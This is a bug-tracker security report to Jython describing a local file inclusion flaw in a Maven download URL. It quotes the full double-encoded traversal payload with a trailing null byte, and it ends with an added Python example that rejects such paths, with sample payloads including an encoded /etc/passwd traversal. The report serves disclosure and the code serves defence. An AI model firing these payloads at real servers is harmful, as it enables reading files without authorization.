From: Tugcan O. <re...@bu...> - 2019-07-01 08:24:10

New submission from Tugcan Ozel <tug...@gm...>:

While I was downloading Jython 2.7 for my Burp plugin, I saw a filepath parameter in the GET requests. I tried an LFI payload and got the picture that is in the attachments.

Payload description: double encoding and null parameter

Payload: https://search.maven.org/remotecontent?filepath=%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00

----------
components: website
files: Screenshot from 2019-07-01 11-08-30.jpg
messages: 12570
nosy: forsa41
severity: critical
status: open
title: LFI
type: security

Added file: https://bugs.jython.org/file1673/Screenshot from 2019-07-01 11-08-30.jpg

_______________________________________
Jython tracker <re...@bu...>
<https://bugs.jython.org/issue2782>
_______________________________________
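
The following is an added example, not part of the original message and not code from Jython or any service named in it: one way a server can canonicalize a `filepath`-style query parameter before use, decoding percent-encoding until the value is stable and then refusing NUL bytes, backslashes and `..` segments. The function names, the exception class and the decode limit are assumptions made for illustration.

```python
from urllib.parse import unquote

MAX_DECODE_ROUNDS = 5  # assumption: deeper encoding nesting is refused outright


class UnsafePath(ValueError):
    """Raised when a requested path must be refused."""


def canonical_filepath(raw: str) -> str:
    """Return a safe relative path for a still-encoded parameter, or raise."""
    value = raw
    # Decode repeatedly so that %252e (double-encoded ".") cannot slip past
    # a check that only looks at the first decoding layer.
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    else:
        raise UnsafePath("too many encoding layers")

    if "\x00" in value:
        raise UnsafePath("NUL byte in path")
    if "\\" in value:
        raise UnsafePath("backslash in path")
    if value.startswith("/"):
        raise UnsafePath("absolute path")
    # Empty, "." and ".." segments are never needed for a repository path.
    for segment in value.split("/"):
        if segment in ("", ".", ".."):
            raise UnsafePath("empty or dot segment in path")
    return value


def is_refused(raw: str) -> bool:
    """Convenience wrapper: True when canonical_filepath rejects the value."""
    try:
        canonical_filepath(raw)
    except UnsafePath:
        return True
    return False


# Constructed sample values (the second is a shortened form of the reported one).
SAMPLES = ["org/example/lib/1.0/lib-1.0.jar", "%25%5c..%25%5c..%00",
           "%252e%252e%252fetc%252fpasswd"]
```

After this check the returned path should still be resolved against the storage root and confirmed to lie inside it before any file is opened.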